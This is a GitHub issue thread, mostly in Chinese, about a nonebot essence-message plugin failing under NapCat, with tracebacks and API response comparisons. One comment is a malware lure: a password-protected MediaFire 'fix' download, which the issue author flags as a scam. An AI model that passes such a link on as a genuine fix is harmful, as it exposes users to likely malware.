### ISSUE TITLE
[Bug] fetchall在NapCat下不可用

### ISSUE THREAD

**Issue by 050644zf** [BEISNWKZNAN/nonebot-plugin-essence-message#4]
使用NapCat最新镜像，在机器人有管理权限的群执行：

![20efef2426e833f45a4983ede411a73](https://github.com/user-attachments/assets/158b3860-e50c-496f-9370-5ecfc1dd98b2)

后台输出：
```
08-27 09:26:08 [INFO] nonebot | Event will be handled by AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=33)
08-27 09:26:08 [INFO] nonebot | AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=33) running complete
08-27 09:26:08 [INFO] nonebot | Event will be handled by AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=96)
08-27 09:26:08 [INFO] nonebot | AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=96) running complete
08-27 09:26:08 [ERROR] nonebot | Running AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=96) failed.
Traceback (most recent call last):
  File "/root/Ifrit-bot/bot.py", line 39, in <module>
    nonebot.run(host="0.0.0.0",app="__mp_main__:app")
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot/__init__.py", line 335, in run
    get_driver().run(*args, **kwargs)
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot/drivers/fastapi.py", line 186, in run
    uvicorn.run(
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/uvicorn/main.py", line 577, in run
    server.run()
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/uvicorn/server.py", line 65, in run
    return asyncio.run(self.serve(sockets=sockets))
  File "/root/miniconda3/envs/bot/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot/message.py", line 476, in check_and_run_matcher
    await _run_matcher(
> File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot/message.py", line 428, in _run_matcher
    await matcher.run(bot, event, state, stack, dependency_cache)
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot/internal/matcher/matcher.py", line 850, in run
    await self.simple_run(bot, event, state, stack, dependency_cache)
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot/internal/matcher/matcher.py", line 825, in simple_run
    await handler(
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot/dependencies/__init__.py", line 94, in __call__
    return await cast(Callable[..., Awaitable[R]], self.call)(**values)
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot_plugin_essence_message/__init__.py", line 100, in random_cmd
    msg = await db.random_essence(event.group_id)
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/nonebot_plugin_essence_message/dateset.py", line 79, in random_essence
    cursor = await conn.execute(
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/aiosqlite/core.py", line 193, in execute
    cursor = await self._execute(self._conn.execute, sql, parameters)
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/aiosqlite/core.py", line 132, in _execute
    return await future
  File "/root/miniconda3/envs/bot/lib/python3.10/site-packages/aiosqlite/core.py", line 115, in run
    result = function()
sqlite3.OperationalError: no such table: essence_data
```

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 050644zf** [comment]
上面这个评论是诈骗，大家不要点

**Comment by MovFish** [comment]
我猜我已经解决过这个问题了，你使用了nonebot-plugin-essence-message 0.2.0吗

**Comment by 050644zf** [comment]
> 我猜我已经解决过这个问题了，你使用了nonebot-plugin-essence-message 0.2.0吗

0.2.0更奇怪了，我在A群执行fetchall，"成功保存0/3条“ 的信息给我发到B群去了

**Comment by MovFish** [comment]
我使用NapCat-docker复现了您的问题，我发现NapCat和Lagrange对于get_essence_msg_list调用的返回形式几乎完全不同，我很好奇这种情况下有没有什么好的解决方法
本插件在Lagrange下调试编写

**Comment by 050644zf** [comment]
> 我使用NapCat-docker复现了您的问题，我发现NapCat和Lagrange对于get_essence_msg_list调用的返回形式几乎完全不同，我很好奇这种情况下有没有什么好的解决方法 本插件在Lagrange下调试编写

我看之前 @SherkeyXD 不是在Napcat那里提了个[issue](https://github.com/NapNeko/NapCatQQ/issues/242)。所以是还没修好吗？

**Comment by SherkeyXD** [comment]
napcat 貌似是加了个默认的 page 参数，具体怎么实现的还没看过）

**Comment by MovFish** [comment]
> > 我使用NapCat-docker复现了您的问题，我发现NapCat和Lagrange对于get_essence_msg_list调用的返回形式几乎完全不同，我很好奇这种情况下有没有什么好的解决方法 本插件在Lagrange下调试编写
> 
> 我看之前 @SherkeyXD 不是在Napcat那里提了个[issue](https://github.com/NapNeko/NapCatQQ/issues/242)。所以是还没修好吗？

目前NapCat的get_essence_msg_list同样是可用的，但是它会返回不用形式值，比如

NapCat
`{'retcode': 0, 'retmsg': 'success', 'data': {'msg_list': [{'group_code': '974980778', 'msg_seq': 1620, 'msg_random': 1372265222, 'sender_uin': '90xxxxxx5', 'sender_nick': 'A', 'sender_time': 1724754647, 'add_digest_uin': '90xxxxxx5', 'add_digest_nick': 'A', 'add_digest_time': 1724755035, 'msg_content': [{'msg_type': 3, 'image_url': 'https://group-digest-pi-1251316161.file.myqcloud.com/74e87c560171d8e1828453a5f8ba4f9f.png', 'image_thumbnail_url': 'https://group-digest-pi-1251316161.file.myqcloud.com/74e87c560171d8e1828453a5f8ba4f9f.png/thumbnail'}], 'can_be_removed': False}, {'group_code': '974980778', 'msg_seq': 1599, 'msg_random': 1317885062, 'sender_uin': '2xxxxxxxx8', 'sender_nick': '御坂5857号', 'sender_time': 1724749711, 'add_digest_uin': '90xxxxxx5', 'add_digest_nick': A', 'add_digest_time': 1724749717, 'msg_content': [{'msg_type': 1, 'text': '成功删除 16/16 条精华消息'}], 'can_be_removed': False}], 'is_end': True, 'group_role': 0, 'config_page_url': 'https://h5.qun.qq.com/h5/qun-essence-message/settings?gc=974980778&_wv=3'}}`

Lagrange
`[{'sender_id': 90xxxxxx5, 'sender_nick': 'A', 'sender_time': 1724754647, 'operator_id': 90xxxxxx5, 'operator_nick': 'A', 'operator_time': 1724755035, 'message_id': 106175238, 'content': [...]}, {'sender_id': 2xxxxxxxx8, 'sender_nick': '御坂5857号', 'sender_time': 1724749711, 'operator_id': 90xxxxxx5, 'operator_nick': 'A', 'operator_time': 1724749717, 'message_id': 104813702, 'content': [{'type': 'text', 'data': {'text': '成功删除 16/16 条精华消息'}}]}]`

此时我如果想获取sender_id需要对两个框架采用不同的代码

**Comment by 050644zf** [comment]
> 此时我如果想获取sender_id需要对两个框架采用不同的代码

能不能通过检测属性的有无来确定使用哪个框架，然后再分别写逻辑

**Comment by MovFish** [comment]
> > 此时我如果想获取sender_id需要对两个框架采用不同的代码
> 
> 能不能通过检测属性的有无来确定使用哪个框架，然后再分别写逻辑

napcat 已更新，使用v2.2.22以上的napcat 即可

**Comment by SherkeyXD** [comment]
现在好像一次只会获取20条？

**Comment by MovFish** [comment]
好像确实，同时那里还没有page参数传入了

**Comment by MovFish** [comment]
> 现在好像一次只会获取20条？

napcat v2.2.24以上应该可以了

**Comment by ElainaFanBoy** [comment]
可以支持下llonebot不，也是返回成功保存0/1条，没有任何报错
